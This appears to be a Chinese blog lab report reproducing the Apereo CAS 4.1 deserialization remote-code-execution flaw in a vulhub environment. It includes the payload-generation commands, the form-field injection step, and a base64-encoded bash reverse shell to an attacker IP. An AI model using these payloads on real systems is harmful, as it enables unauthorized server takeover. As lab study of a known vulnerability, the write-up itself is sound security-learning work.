Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告

演示视频

Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM：《芳华慢》+《霜雪千年》（by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/

参考文章

https://vulhub.org/#/environments/apereo-cas/4.1-rce/

Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vulhub提供的文件创建漏洞复现环境运行后将监听8080端口，访问http://your-ip:8080/cas/login查看登录页面。二. Exploit4.1.7 之前 Apereo CAS 的开箱即用默认配置使用默认密钥changeit：public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBehttps://blog.csdn.net/qq_37043565/article/details/118293610?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164307647816780264088090%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=164307647816780264088090&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-118293610.first_rank_v2_pc_rank_v29&utm_term=Apereo+CAS+4.1+%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96+RCE+%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187 Apereo CAS 4.1/4.x 反序列化RCE漏洞 漏洞复现_ADummy的博客-CSDN博客_apache cas 漏洞Apereo CAS 4.1反序列化RCE漏洞by ADummy0x00利用路线​构造（可以使用ysoserial）可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面，读取消息，触发漏洞—>代码执行0x01漏洞介绍​Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题，该案例引起了RCE漏洞。Apereo Cas一般是用来做身份认证的，所以有一定的攻击https://blog.csdn.net/weixin_43416469/article/details/113888749?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164307647816780264088090%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=164307647816780264088090&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-113888749.first_rank_v2_pc_rank_v29&utm_term=Apereo+CAS+4.1+%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96+RCE+%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187

Apereo CAS 4.1 反序列化命令执行漏洞复现_锋刃科技的博客-CSDN博客_apereo cas漏洞漏洞概述Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。影响版本 Apereo CAS <= 4.1.7环境搭建这里我使用vulhub来安装环境进入目录并安装启动一个Apereo CAS 4.1.5：cd vulhub-master/apereo-cas/4.1-rce/...https://blog.csdn.net/xuandao_ahfengren/article/details/111159308?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164307647816780264096434%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164307647816780264096434&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-4-111159308.first_rank_v2_pc_rank_v29&utm_term=Apereo+CAS+4.1+%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96+RCE+%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187 

什么是Apereo CAS

Apereo CAS 是一款Apereo发布的集中认证服务平台，常被用于企业单点登录系统。

Apereo CAS 4.1 反序列化 RCE 漏洞原理

CAS 尝试通过 Apache Commons Collections 库反序列化对象时存在问题，该库导致了 RCE 漏洞。4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞（硬编码导致的漏洞），进而执行任意命令。

该漏洞影响的Apereo CAS版本

版本不大于4.1.7

漏洞利用限制

版本不大于4.1.7

漏洞复现

靶机IP：192.168.192.135

攻击机IP：192.168.192.141

 靶场搭建：docker-compose+vulhub ，可以看到靶场运行在8080端口

攻击机查看靶场环境，靶机IP:8080/cas/login

 

使用apereo-cas-attack-1.0-SNAPSHOT-all.jar生成加密的ysoserial的序列化对象 

payload

1.执行命令在/root目录新建success目录

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /root/success"

在登录页面提交表单时，使用burpsuite抓包，并把提交数据中的execution字段的值替换为生成的payload，然后发包。可以看到在靶机的/root目录中新建了success目录，命令执行成功

 

 2.接下来把执行的payload换成反弹shell命令，并使用base64编码绕过java机制

 

​java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5Mi4xNDEvNzc3NyAwPiYxIA==}|{base64,-d}|{bash,-i}"

 

然后抓包，改包，发包(和之前操作一样)，并在攻击机上使用nc监听反弹shell的端口 

 

可以看到shell反弹到攻击机的7777端口 ，由此该漏洞复现成功

写在最后的话

第一次复现漏洞，参考了很多篇相关的文章才完成，若有任何错误或失误的地方，请各位指正